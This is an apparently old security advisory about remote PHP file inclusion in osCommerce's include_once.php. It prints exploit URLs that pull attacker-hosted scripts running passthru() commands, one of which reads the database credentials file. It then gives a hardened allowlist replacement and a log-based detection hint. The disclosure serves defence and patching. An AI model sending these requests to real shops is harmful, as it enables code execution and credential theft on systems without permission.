PHP source injection in osCommerce
----------------------------------

Product Description

osCommerce is an open source e-commerce solution under ongoing development by the open source community. Its feature-packed out-of-the-box installation allows store owners to set up, run, and maintain their online stores with minimum effort and at no cost. It can be found at http://www.oscommerce.com

Tested version

Preview Release 2.1 (06/03/2001) (this is a preview version, but a lot of online shops already use it)

The Problem

osCommerce comes with a file called /catalog/includes/include_once.php, which looks like this:

-------- include_once.php --------
<?
// $include_file is never set by this script; it comes straight from the request
if (!defined($include_file . '__')) {
    define($include_file . '__', 1);
    include($include_file);
}
?>
----------------------------------

If someone requests a URL like

http://SERVER/catalog/includes/include_once.php?include_file=FILE_WE_WANT_TO_INCLUDE

he is able to include any code he wants. This is a serious problem, because that user could then query the SQL server and get access to other important files...

Examples

-------- Example 1 --------
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/a.php

--- a.php ---
<? passthru("/bin/ls") ?>
-------------

Output: directory listing of the current directory
---------------------------

-------- Example 2 --------
http://SERVER/catalog/includes/include_once.php?include_file=http://MYBOX/b.php

--- b.php ---
<? passthru("/bin/cat application_top.php") ?>
-------------

Output: the contents of application_top.php, which include the MySQL username, password, ...
---------------------------

I informed the vendor and hope that they will release a patch soon.

------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be
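The root cause is that include_once.php trusts a variable it never sets: with register_globals on (the PHP 4 default) the query-string parameter include_file becomes $include_file, and with allow_url_fopen on, include() will fetch an http:// URL. The following hardened replacement is an added example, not osCommerce's own code or the vendor's patch; the allowlist keys, the /var/www/catalog paths and the use of $_GET (PHP 4.1 or later) are assumptions.

```php
<?php
// Added example: a hardened stand-in for catalog/includes/include_once.php.
// Besides this check, set register_globals = Off and allow_url_fopen = Off in
// php.ini so that request parameters never become variables and include()
// cannot fetch remote URLs at all.

// Only these local files may be included through this front door.
// Keys and paths are hypothetical placeholders for this example.
$allowed_includes = array(
    'application_top' => '/var/www/catalog/includes/application_top.php',
    'languages'       => '/var/www/catalog/includes/languages.php',
);

// Read the parameter explicitly instead of relying on register_globals.
$requested = isset($_GET['include_file']) ? (string) $_GET['include_file'] : '';

// Accept only a bare allowlist key: no slashes, dots, or URL schemes can
// survive this pattern, so neither http://MYBOX/a.php nor ../ paths get through.
if (!preg_match('/^[a-z_]+$/', $requested) || !isset($allowed_includes[$requested])) {
    header('HTTP/1.0 400 Bad Request');
    exit('invalid include');
}

// The include-once guard from the original, now keyed on the validated name
// and resolving to a fixed local path rather than to attacker-supplied text.
$path  = $allowed_includes[$requested];
$guard = $requested . '__';
if (!defined($guard)) {
    define($guard, 1);
    include($path);
}
?>
```

On the detection side, a web server log line containing include_once.php with include_file= followed by http:// or ftp:// is a direct indicator that this issue is being probed.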